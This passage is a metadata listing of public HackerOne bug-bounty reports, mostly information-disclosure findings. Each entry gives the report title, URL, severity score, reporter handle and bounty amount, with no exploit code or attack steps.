Bounty paid\nnull\n\n\n---\n\n\n### Title\nsdrc.starbucks.com - Information Disclosure via unsecured attachment directory\n#### URL \nhttps://hackerone.com/reports/769016\n#### Severity score\n9.8\n#### Reporter \nl00ph0le\n### Bounty paid\n$4,000\n\n\n---\n\n\n### Title\nНайден build.sh в webagent.mail.ru\n#### URL \nhttps://hackerone.com/reports/418294\n#### Severity score\n0\n#### Reporter \nartebels\n### Bounty paid\n$100\n\n\n---\n\n\n### Title\nlatest_activity_id and latest_activity_at may disclose information about internal activities to unauthorized users\n#### URL \nhttps://hackerone.com/reports/724944\n#### Severity score\n3.4\n#### Reporter \negrep\n### Bounty paid\n$1,000\n\n\n---\n\n\n### Title\nMail.ru for Android Content Provider Vulnerability\n#### URL \nhttps://hackerone.com/reports/143280\n#### Severity score\nnull\n#### Reporter \nmurthy68\n### Bounty paid\n$250\n\n\n---\n\n\n### Title\nSensitive Information Disclosure https://cards-dev.twitter.com\n#### URL \nhttps://hackerone.com/reports/268888\n#### Severity score\nnull\n#### Reporter \nhassham\n### Bounty paid\n$280\n\n\n---\n\n\n### Title\nAble to intercept app Traffic after choosing up the Secured Connection using SSL (HTTPS)\n#### URL \nhttps://hackerone.com/reports/64731\n#### Severity score\nnull\n#### Reporter \nbugwrangler\n### Bounty paid\n$100\n\n\n---\n\n\n### Title\n[Not just a server configuration issue] Full Path Disclosure \n#### URL \nhttps://hackerone.com/reports/153628\n#### Severity score\nnull\n#### Reporter \nahsan\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nСКР инжект \n#### URL \nhttps://hackerone.com/reports/520871\n#### Severity score\nnull\n#### Reporter \nlinkks\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nНебезопасная схема выдачи номера карты QVC (возможно, также QVV и QVP)\n#### URL \nhttps://hackerone.com/reports/87586\n#### Severity score\nnull\n#### Reporter \npostboy\n### Bounty paid\n$200\n\n\n---\n\n\n### Title\nInformation leakage on django.aspen.io\n#### URL \nhttps://hackerone.com/reports/272982\n#### Severity score\nnull\n#### Reporter \nrey_7\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nFull Path Disclosure on gmchat.gm.com\n#### URL \nhttps://hackerone.com/reports/111999\n#### Severity score\nnull\n#### Reporter \nrmashhoon\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nIRC-Bot exposes information\n#### URL \nhttps://hackerone.com/reports/222870\n#### Severity score\nnull\n#### Reporter \nluke081515\n### Bounty paid\n$300\n\n\n---\n\n\n### Title\nTiming attack towards endpoints on the web without CSRF \n#### URL \nhttps://hackerone.com/reports/348168\n#### Severity score\n2.9\n#### Reporter \nb258ea62bf297b02afa9854\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nUnexpected array leaks information about the system\n#### URL \nhttps://hackerone.com/reports/7888\n#### Severity score\nnull\n#### Reporter \nmelvin\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\n[Cross-domain Referer leakage] Password reset token leakage via referer\n#### URL \nhttps://hackerone.com/reports/253448\n#### Severity score\nnull\n#### Reporter \nr3y\n### Bounty paid\n$20\n\n\n---\n\n\n### Title\nDirectory listing - i am able to download all php_agent archive\n#### URL \nhttps://hackerone.com/reports/207384\n#### Severity score\nnull\n#### Reporter \ncj862530\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nRequesting Show CheckIn Alert for Non Friend User\n#### URL \nhttps://hackerone.com/reports/174882\n#### Severity score\nnull\n#### Reporter \nvinesh1989\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nFull Path Disclosure\n#### URL \nhttps://hackerone.com/reports/47876\n#### Severity score\nnull\n#### Reporter \nc37hun\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nMissing authorization checks leading to the exposure of ubernihao.com administrator accounts \n#### URL \nhttps://hackerone.com/reports/154762\n#### Severity score\nnull\n#### Reporter \nissam_rabhi\n### Bounty paid\n$3,000\n\n\n---\n\n\n### Title\nCritical information disclosure at https://█████████\n#### URL \nhttps://hackerone.com/reports/200079\n#### Severity score\nnull\n#### Reporter \njuliocesar\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nexpress config leaking stacktrace\n#### URL \nhttps://hackerone.com/reports/205069\n#### Severity score\n4\n#### Reporter \nprbln\n### Bounty paid\n$50\n\n\n---\n\n\n### Title\nEmails of invited collaborators are disclosed in full in payload for report participants\n#### URL \nhttps://hackerone.com/reports/269230\n#### Severity score\n3.4\n#### Reporter \nflashdisk\n### Bounty paid\n$1,500\n\n\n---\n\n\n### Title\nInformation disclosure of user by email using buy widget\n#### URL \nhttps://hackerone.com/reports/176002\n#### Severity score\nnull\n#### Reporter \ncablej\n### Bounty paid\n$100\n\n\n---\n\n\n### Title\nexternal entity expansion in Apache POI \n#### URL \nhttps://hackerone.com/reports/25537\n#### Severity score\nnull\n#### Reporter \nmohaab007\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nMapbox Android SDK uses Broadcast Receiver instead of Local Broadcast Manager\n#### URL \nhttps://hackerone.com/reports/192886\n#### Severity score\nnull\n#### Reporter \nmishre\n### Bounty paid\n$1,000\n\n\n---\n\n\n### Title\nFull Path Disclosure (FPD) in www.localize.im\n#### URL \nhttps://hackerone.com/reports/9256\n#### Severity score\nnull\n#### Reporter \nfaisalahmed\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nPassword reset token leakage through referrer at https://app.c2fo.com/password/reset/\n#### URL \nhttps://hackerone.com/reports/5691\n#### Severity score\nnull\n#### Reporter \ninternetwache\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nNginx server version disclosure\n#### URL \nhttps://hackerone.com/reports/182046\n#### Severity score\nnull\n#### Reporter \njapz\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\n[mena.starbucks.com] Laravel App Log & Configuration Disclosure.\n#### URL \nhttps://hackerone.com/reports/401098\n#### Severity score\nnull\n#### Reporter \nbobrov\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nSSRF on synthetics.newrelic.com permitting access to sensitive data\n#### URL \nhttps://hackerone.com/reports/141682\n#### Severity score\nnull\n#### Reporter \nylujion\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nPrivate leaderboard owner email disclosure when sending invites\n#### URL \nhttps://hackerone.com/reports/969988\n#### Severity score\nnull\n#### Reporter \nnrekany\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\n[lk-cdn.3igames.mail.ru] apc.php\n#### URL \nhttps://hackerone.com/reports/277664\n#### Severity score\nnull\n#### Reporter \nbobrov\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nRead Application Name , Subscribers Count \n#### URL \nhttps://hackerone.com/reports/184057\n#### Severity score\nnull\n#### Reporter \ncyriac\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nNotification of previous signed out user leakage.\n#### URL \nhttps://hackerone.com/reports/26395\n#### Severity score\nnull\n#### Reporter \nsiddiki\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nhttps://voip.agent.mail.ru/phpinfo.php\n#### URL \nhttps://hackerone.com/reports/63075\n#### Severity score\nnull\n#### Reporter \nisox\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nPartial password leak over DNS on HTTP redirect\n#### URL \nhttps://hackerone.com/reports/874778\n#### Severity score\n5.5\n#### Reporter \nmszpl\n### Bounty paid\n$400\n\n\n---\n\n\n### Title\nMisconfigured Bucket [razer-assets2] https://assets2.razerzone.com/\n#### URL \nhttps://hackerone.com/reports/756703\n#### Severity score\nnull\n#### Reporter \nzelzal\n### Bounty paid\n$250\n\n\n---\n\n\n### Title\nUnrestricted View to People’s Web Invoices Data without knowing the Unique Hash\n#### URL \nhttps://hackerone.com/reports/152992\n#### Severity score\nnull\n#### Reporter \nabcdefghijklmnopqrstuvwxyzabc\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\n/accounts/USERID.json file is left open for Restricted User of organization disclosing Owners's Mobile Number and \"billing_info, cc_email\"\n#### URL \nhttps://hackerone.com/reports/221250\n#### Severity score\nnull\n#### Reporter \npeeper35\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nDisclosure of private programs that have an \"external\" page on HackerOne\n#### URL \nhttps://hackerone.com/reports/124611\n#### Severity score\nnull\n#### Reporter \nsaeedhashem\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nChecking whether user liked the media or not even when you are blocked \n#### URL \nhttps://hackerone.com/reports/111417\n#### Severity score\nnull\n#### Reporter \nvraj\n### Bounty paid\n$100\n\n\n---\n\n\n### Title\nPort and service scanning on localhost due to improper URL validation.\n#### URL \nhttps://hackerone.com/reports/773313\n#### Severity score\n6.3\n#### Reporter \nvshmuk\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nInformation Disclosure\n#### URL \nhttps://hackerone.com/reports/330860\n#### Severity score\nnull\n#### Reporter \nalyssa_herrera\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nFlickr: Invitations disclosure (resend feature)\n#### URL \nhttps://hackerone.com/reports/1533\n#### Severity score\nnull\n#### Reporter \nd4d1a179c0f3\n### Bounty paid\n$750\n\n\n---\n\n\n### Title\nInformation leakage - Private reports cached by Google \n#### URL \nhttps://hackerone.com/reports/80118\n#### Severity score\nnull\n#### Reporter \ntisisire\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nhttps://www.legalrobot.com/\n#### URL \nhttps://hackerone.com/reports/228156\n#### Severity score\nnull\n#### Reporter \ncaesar302\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nGenerating Unlimited Free Travel Gift Invites | IDOR\n#### URL \nhttps://hackerone.com/reports/49499\n#### Severity score\nnull\n#### Reporter \nshamrocksu88\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\ndirectory listing in https://demo.owncloud.org/doc/\n#### URL \nhttps://hackerone.com/reports/105149\n#### Severity score\nnull\n#### Reporter \nba4fe4ca95021d367f8a574\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nTransitioning a Private Program to Public Does Not Clear Previously Private Updates to Hackers\n#### URL \nhttps://hackerone.com/reports/210190\n#### Severity score\n5.3\n#### Reporter \n0xffe4\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nOpcode Cache\n#### URL \nhttps://hackerone.com/reports/308355\n#### Severity score\nnull\n#### Reporter \nlinkks\n### Bounty paid\n$300\n\n\n---\n\n\n### Title\nPrivate key \"tron\" leaked via Travis CI Log\n#### URL \nhttps://hackerone.com/reports/472651\n#### Severity score\nnull\n#### Reporter \nrhynorater\n### Bounty paid\n$1,000\n\n\n---\n\n\n### Title\nSMTP user enumeration via mail.zendesk.com\n#### URL \nhttps://hackerone.com/reports/193314\n#### Severity score\nnull\n#### Reporter \ngeeknik\n### Bounty paid\n$50\n\n\n---\n\n\n### Title\nUser Information sent to client through websockets\n#### URL \nhttps://hackerone.com/reports/168223\n#### Severity score\nnull\n#### Reporter \narchers123\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nImage Injection on www.rockstargames.com/screenshot-viewer/responsive/image may allow facebook oauth token theft.\n#### URL \nhttps://hackerone.com/reports/497655\n#### Severity score\n6.8\n#### Reporter \nnetfuzzer\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nРаскрытие чувствительной информации composer.lock docker-compose.yml \n#### URL \nhttps://hackerone.com/reports/714186\n#### Severity score\nnull\n#### Reporter \npisarenko\n### Bounty paid\n$100\n\n\n---\n\n\n### Title\nSTAFF \"No-Permissions\" on the Store can retrieve the details Order via exchangeReceiptSend\n#### URL \nhttps://hackerone.com/reports/917875\n#### Severity score\n6.9\n#### Reporter \nlangduvnsec\n### Bounty paid\n$1,000\n\n\n---\n\n\n### Title\nпхпинфо\n#### URL \nhttps://hackerone.com/reports/622118\n#### Severity score\nnull\n#### Reporter \nlinkks\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nhttps://newsletter.nextcloud.com Directory listening and Information Disclosure\n#### URL \nhttps://hackerone.com/reports/145603\n#### Severity score\nnull\n#### Reporter \nmefkan\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nFull Path Disclosure / Info Disclosure in Creating New Group\n#### URL \nhttps://hackerone.com/reports/8090\n#### Severity score\nnull\n#### Reporter \nfaisalahmed\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nServer Version Of https://www.olx.ph/\n#### URL \nhttps://hackerone.com/reports/197238\n#### Severity score\nnull\n#### Reporter \njaypogzz\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nPrivate IP addresses Disclosure\n#### URL \nhttps://hackerone.com/reports/908880\n#### Severity score\nnull\n#### Reporter \niwiwwooqo\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nРаскрытие путей сервера за счёт неопределённого индекса в сценарии /home/berserk-online.com/public_html/forum/Themes/berserker/Profile.template.php\n#### URL \nhttps://hackerone.com/reports/12794\n#### Severity score\nnull\n#### Reporter \nbigbear\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nServer version disclosure\n#### URL \nhttps://hackerone.com/reports/167041\n#### Severity score\nnull\n#### Reporter \ntop\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nLack of rate limiting on get.uber.com leads to enumeration of promotion codes and estimation of a lower bound on the number of Uber drivers\n#### URL \nhttps://hackerone.com/reports/125200\n#### Severity score\nnull\n#### Reporter \nddworken\n### Bounty paid\n$3,000\n\n\n---\n\n\n### Title\nEnumeration of subscribed users and unauthenticated email unsubscriptions on https://newsletter.nextcloud.com/?p=unsubscribe\n#### URL \nhttps://hackerone.com/reports/145396\n#### Severity score\nnull\n#### Reporter \nstrukt\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nCVE-2020-14179 on https://jira.theendlessweb.com/secure/QueryComponent!Default.jspa leads to information disclosure\n#### URL \nhttps://hackerone.com/reports/1003980\n#### Severity score\nnull\n#### Reporter \nnagli\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nResearcher gets email updates on a private program after he/she quits that program.\n#### URL \nhttps://hackerone.com/reports/174449\n#### Severity score\n3.5\n#### Reporter \nsasi2103\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nSensitive information disclosure\n#### URL \nhttps://hackerone.com/reports/504122\n#### Severity score\nnull\n#### Reporter \nl34r00t\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nCSV Injection in business.uber.com\n#### URL \nhttps://hackerone.com/reports/126109\n#### Severity score\nnull\n#### Reporter \nddworken\n### Bounty paid\n$1,000\n\n\n---\n\n\n### Title\nKovri: potential buffer over-read in garlic clove handling + I2NP message creation\n#### URL \nhttps://hackerone.com/reports/291489\n#### Severity score\n7.7\n#### Reporter \naerodudrizzt\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nProxy discloses internal web servers\n#### URL \nhttps://hackerone.com/reports/1409\n#### Severity score\nnull\n#### Reporter \njobert\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\n(FULL PATH DISCLOSURE) Unknown MySQL server host 'shardm-reader.chi2.shopify.io' \n#### URL \nhttps://hackerone.com/reports/157876\n#### Severity score\nnull\n#### Reporter \njamesclyde\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nPotentially vulnerable version of Apache software in and default files on https://iandunn.name/\n#### URL \nhttps://hackerone.com/reports/161459\n#### Severity score\nnull\n#### Reporter \nethnicalhacker\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nPassphrase credential lock bypass\n#### URL \nhttps://hackerone.com/reports/139626\n#### Severity score\nnull\n#### Reporter \nvorpal\n### Bounty paid\n$300\n\n\n---\n\n\n### Title\nWordpress VIP leaks email of the test a/c\n#### URL \nhttps://hackerone.com/reports/540301\n#### Severity score\n5.3\n#### Reporter \najay_saycure\n### Bounty paid\n$100\n\n\n---\n\n\n### Title\nUsers contents on AWS is cacheable \n#### URL \nhttps://hackerone.com/reports/163131\n#### Severity score\nnull\n#### Reporter \nabdullah\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nDirectory Listing on https://promo-services-staging.brave.com\n#### URL \nhttps://hackerone.com/reports/371464\n#### Severity score\nnull\n#### Reporter \ntestingforbugs\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nImportant information leaked on Github\n#### URL \nhttps://hackerone.com/reports/649322\n#### Severity score\n7.3\n#### Reporter \nmohanaddobal\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nSnippet JS template allows attacker to read a user's private snippets\n#### URL \nhttps://hackerone.com/reports/348443\n#### Severity score\nnull\n#### Reporter \njobert\n### Bounty paid\n$300\n\n\n---\n\n\n### Title\nRetrieval and alteration of exposed media on Android Oreo \n#### URL \nhttps://hackerone.com/reports/462441\n#### Severity score\n5.9\n#### Reporter \ndoragon\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nMISSING SPF (Sender Policy Framework) for meteorapm.com\n#### URL \nhttps://hackerone.com/reports/12341\n#### Severity score\nnull\n#### Reporter \natom\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nbug reporting template encourages users to paste config file with passwords\n#### URL \nhttps://hackerone.com/reports/196878\n#### Severity score\nnull\n#### Reporter \nhanno\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nTest\n#### URL \nhttps://hackerone.com/reports/33153\n#### Severity score\nnull\n#### Reporter \nmdlitch1973\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nPrivate/confidential setting of calendar events is ignored on activity stream\n#### URL \nhttps://hackerone.com/reports/476615\n#### Severity score\nnull\n#### Reporter \nnickvergessen\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nList of a ton of internal twitter servers available on GitHub\n#### URL \nhttps://hackerone.com/reports/137404\n#### Severity score\nnull\n#### Reporter \na0005\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nAPI OAuth Public Key disclosure in mobile app\n#### URL \nhttps://hackerone.com/reports/160120\n#### Severity score\nnull\n#### Reporter \ncablej\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nSource code disclosure at ███\n#### URL \nhttps://hackerone.com/reports/902322\n#### Severity score\nnull\n#### Reporter \n0xd0ff\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\n███ exposes sensitive shipment information to public web\n#### URL \nhttps://hackerone.com/reports/389116\n#### Severity score\nnull\n#### Reporter \ncablej_dds\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nA 10GB file is reachable\n#### URL \nhttps://hackerone.com/reports/416516\n#### Severity score\nnull\n#### Reporter \napt-mirror\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\n[vitrina.contact-sys.com] Full Path Disclosure\n#### URL \nhttps://hackerone.com/reports/178284\n#### Severity score\nnull\n#### Reporter \nbobrov\n### Bounty paid\n$100\n\n\n---\n\n\n### Title\nDisclosure of locally served nerdpacks due to nr-local.net CORS policy misconfiguration\n#### URL \nhttps://hackerone.com/reports/746786\n#### Severity score\nnull\n#### Reporter \nskavans\n### Bounty paid\n$625\n\n\n---\n\n\n### Title\nDirectory index and information disclosure\n#### URL \nhttps://hackerone.com/reports/46345\n#### Severity score\nnull\n#### Reporter \n4lemon\n### Bounty paid\n$25\n\n\n---\n\n\n### Title\nReferer Referer Header Leakage in language changer may lead to FB token theft\n#### URL \nhttps://hackerone.com/reports/870062\n#### Severity score\n3.8\n#### Reporter \nnetfuzzer\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nBrute Forcing rider-view Endpoint Allows for Counting Number of Active Uber Drivers\n#### URL \nhttps://hackerone.com/reports/127025\n#### Severity score\nnull\n#### Reporter \nddworken\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nVine all registered user Private/sensitive information disclosure .[ Ip address/phone no/email and many other informations ]\n#### URL \nhttps://hackerone.com/reports/202823\n#### Severity score\n9.3\n#### Reporter \n0xprial\n### Bounty paid\n$7,560\n\n\n---\n\n\n### Title\nubernycmarketplace.com is vulnerable to the Heartbleed Bug\n#### URL \nhttps://hackerone.com/reports/304190\n#### Severity score\nnull\n#### Reporter \nhealdb\n### Bounty paid\n$1,500\n\n\n---\n\n\n### Title\nExposed ███████ Administrative Interface (ColdFusion 11)\n#### URL \nhttps://hackerone.com/reports/223948\n#### Severity score\nnull\n#### Reporter \njamesit\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nBanner Grabbing - Apache Server Version Disclousure\n#### URL \nhttps://hackerone.com/reports/269467\n#### Severity score\nnull\n#### Reporter \ncybertiger\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nExistence of Folder path by guessing the path through response\n#### URL \nhttps://hackerone.com/reports/174645\n#### Severity score\n6.3\n#### Reporter \nashish_r_padelkar\n### Bounty paid\n$250\n\n\n---\n\n\n### Title\nability to retrieve a user's phone-number/email for a given inviteCode\n#### URL \nhttps://hackerone.com/reports/178503\n#### Severity score\nnull\n#### Reporter \nkushal89shah\n### Bounty paid\n$1,000\n\n\n---\n\n\n### Title\nUnauthorized user is able to access schedule pipeline variables and values\n#### URL \nhttps://hackerone.com/reports/962462\n#### Severity score\nnull\n#### Reporter \nvaib25vicky\n### Bounty paid\n$3,000\n\n\n---\n\n\n### Title\nWeak Ciphers Enabled\n#### URL \nhttps://hackerone.com/reports/6488\n#### Severity score\nnull\n#### Reporter \nyourdarkshadow\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nHTTP 401 response injection on \"amp.twimg.com/amplify-web-player/prod/source.html\" through \"image_src\" parameter\n#### URL \nhttps://hackerone.com/reports/221328\n#### Severity score\nnull\n#### Reporter \nzlz\n### Bounty paid\n$560\n\n\n---\n\n\n### Title\nDirectory listening enabled in: 88.198.160.130\n#### URL \nhttps://hackerone.com/reports/156510\n#### Severity score\nnull\n#### Reporter \nsandh0t\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\n Information disclosure at http://sea-s2s.molthailand.com/status.php\n#### URL \nhttps://hackerone.com/reports/721761\n#### Severity score\nnull\n#### Reporter \nt3ngu\n### Bounty paid\n$375\n\n\n---\n\n\n### Title\nBypassing one-time checkout router page (revealing payment information)\n#### URL \nhttps://hackerone.com/reports/271176\n#### Severity score\nnull\n#### Reporter \ntolo7010\n### Bounty paid\n$100\n\n\n---\n\n\n### Title\nToken leakage by referrer header & analytics\n#### URL \nhttps://hackerone.com/reports/252544\n#### Severity score\nnull\n#### Reporter \nmyster\n### Bounty paid\n$20\n\n\n---\n\n\n### Title\nInformation leakage through Graphviz blocks\n#### URL \nhttps://hackerone.com/reports/88395\n#### Severity score\nnull\n#### Reporter \njbeta\n### Bounty paid\n$300\n\n\n---\n\n\n### Title\nSensitive information disclosure\n#### URL \nhttps://hackerone.com/reports/207388\n#### Severity score\nnull\n#### Reporter \nkothari\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nReport invitation links not restricted to any existing user\n#### URL \nhttps://hackerone.com/reports/214839\n#### Severity score\n2.7\n#### Reporter \njapz\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nPHP and Wordpress version disclosure\n#### URL \nhttps://hackerone.com/reports/9516\n#### Severity score\nnull\n#### Reporter \nsiddiki\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nInsecure transition from HTTP to HTTPS in form post\n#### URL \nhttps://hackerone.com/reports/123915\n#### Severity score\nnull\n#### Reporter \nd0rkerdevil\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nPossible SSRF at URL Parameter while creating a new package repository\n#### URL \nhttps://hackerone.com/reports/151680\n#### Severity score\nnull\n#### Reporter \nkiraak-boy\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nMultiple information disclosure\n#### URL \nhttps://hackerone.com/reports/37862\n#### Severity score\nnull\n#### Reporter \npsych0tr1a\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nFetch private list metadata and any user's personal name\n#### URL \nhttps://hackerone.com/reports/162822\n#### Severity score\nnull\n#### Reporter \nsameoldstory\n### Bounty paid\n$150\n\n\n---\n\n\n### Title\n[qiwi.com] Information Disclosure\n#### URL \nhttps://hackerone.com/reports/164168\n#### Severity score\nnull\n#### Reporter \nbobrov\n### Bounty paid\n$150\n\n\n---\n\n\n### Title\n[element.mail.ru] /.svn/entries\n#### URL \nhttps://hackerone.com/reports/187602\n#### Severity score\nnull\n#### Reporter \nbobrov\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nBlacklist bypass on Callback URLs\n#### URL \nhttps://hackerone.com/reports/53004\n#### Severity score\nnull\n#### Reporter \nagarri_fr\n### Bounty paid\n$100\n\n\n---\n\n\n### Title\nGet analytics token using only apps permission\n#### URL \nhttps://hackerone.com/reports/901775\n#### Severity score\nnull\n#### Reporter \njmp_35p\n### Bounty paid\n$1,000\n\n\n---\n\n\n### Title\nLegacy API exposes private video titles\n#### URL \nhttps://hackerone.com/reports/111386\n#### Severity score\nnull\n#### Reporter \nnathonsecurity\n### Bounty paid\n$100\n\n\n---\n\n\n### Title\nRegistering with email [ +70 Chars ] Lead to Disclose some informations [Django Debug Mode ]\n#### URL \nhttps://hackerone.com/reports/963584\n#### Severity score\nnull\n#### Reporter \nelmahdi\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nPrivate System Note Disclosure using GraphQL\n#### URL \nhttps://hackerone.com/reports/633001\n#### Severity score\nnull\n#### Reporter \nngalog\n### Bounty paid\n$1,000\n\n\n---\n\n\n### Title\nSensitive data disclosure via exposed phpunit file\n#### URL \nhttps://hackerone.com/reports/543775\n#### Severity score\nnull\n#### Reporter \nl34r00t\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nUsers can download old project exports due to unclaimed namespace\n#### URL \nhttps://hackerone.com/reports/195058\n#### Severity score\n4.8\n#### Reporter \njobert\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nLeaking Of Sensitive Information on Github\n#### URL \nhttps://hackerone.com/reports/837733\n#### Severity score\nnull\n#### Reporter \nharrisoft\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nOrder notifications being sent for a deactivated staff account\n#### URL \nhttps://hackerone.com/reports/331223\n#### Severity score\n3.4\n#### Reporter \nnewbie_101\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nWeb cache deception attack - expose token information\n#### URL \nhttps://hackerone.com/reports/397508\n#### Severity score\n6.5\n#### Reporter \nmemon\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nSSRF when importing a project from a git repo by URL\n#### URL \nhttps://hackerone.com/reports/135937\n#### Severity score\nnull\n#### Reporter \nstrukt\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nServer responds with the server error logs on account creation\n#### URL \nhttps://hackerone.com/reports/57692\n#### Severity score\nnull\n#### Reporter \ncrab\n### Bounty paid\n$50\n\n\n---\n\n\n### Title\nStored blind xss on showmax support team\n#### URL \nhttps://hackerone.com/reports/307485\n#### Severity score\nnull\n#### Reporter \nmostafamamdoh\n### Bounty paid\n$256\n\n\n---\n\n\n### Title\nMultiple Path Disclosure\n#### URL \nhttps://hackerone.com/reports/9485\n#### Severity score\nnull\n#### Reporter \nanant\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nDefault.aspx exposing full path and other info on wip.origin-community.xero.com\n#### URL \nhttps://hackerone.com/reports/122898\n#### Severity score\nnull\n#### Reporter \ndaveysec\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nInternal Ports Scanning via Blind SSRF\n#### URL \nhttps://hackerone.com/reports/281950\n#### Severity score\nnull\n#### Reporter \ntungpun\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nApplication error message\n#### URL \nhttps://hackerone.com/reports/148963\n#### Severity score\nnull\n#### Reporter \nlinkks\n### Bounty paid\n$20\n\n\n---\n\n\n### Title\nMaking program preference -> program visibilty feature usless and disclosing API Identifier in the progress and data that may cause potential IDORS.\n#### URL \nhttps://hackerone.com/reports/929361\n#### Severity score\n3.8\n#### Reporter \nspongebhav\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nУтечка информации через JSONP (XXSI)\n#### URL \nhttps://hackerone.com/reports/118418\n#### Severity score\nnull\n#### Reporter \ncyberpunkych\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nTodos are not redacted when membership changes - Access to (confidential) issues and merge requests\n#### URL \nhttps://hackerone.com/reports/880863\n#### Severity score\nnull\n#### Reporter \nvaib25vicky\n### Bounty paid\n$2,000\n\n\n---\n\n\n### Title\nFull Path Disclosure by removing CSRF token\n#### URL \nhttps://hackerone.com/reports/150018\n#### Severity score\nnull\n#### Reporter \nvelby\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nListing of Amazon S3 Bucket accessible to any amazon authenticated user (metrics.pscp.tv)\n#### URL \nhttps://hackerone.com/reports/278191\n#### Severity score\nnull\n#### Reporter \nsegumarc\n### Bounty paid\n$140\n\n\n---\n\n\n### Title\nSensitive data exposure via https://████████.mil/secure/QueryComponent!Default.jspa - CVE-2020-14179\n#### URL \nhttps://hackerone.com/reports/988550\n#### Severity score\nnull\n#### Reporter \nr4d1kal\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nServer Name disclosure\n#### URL \nhttps://hackerone.com/reports/825815\n#### Severity score\nnull\n#### Reporter \njulfikar\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nPII of Users Disclosure using \"/members/invite/\" endpoint\n#### URL \nhttps://hackerone.com/reports/787955\n#### Severity score\n7.1\n#### Reporter \nbonikia97\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nList of devices is accessible regardless of the account limitations\n#### URL \nhttps://hackerone.com/reports/97535\n#### Severity score\nnull\n#### Reporter \nrms\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nAccess private list metadata\n#### URL \nhttps://hackerone.com/reports/178506\n#### Severity score\nnull\n#### Reporter \nsameoldstory\n### Bounty paid\n$100\n\n\n---\n\n\n### Title\nAbility to see password protected content by bypassing the password page of shopify preview URL for new development stores (as of August 17, 2020)\n#### URL 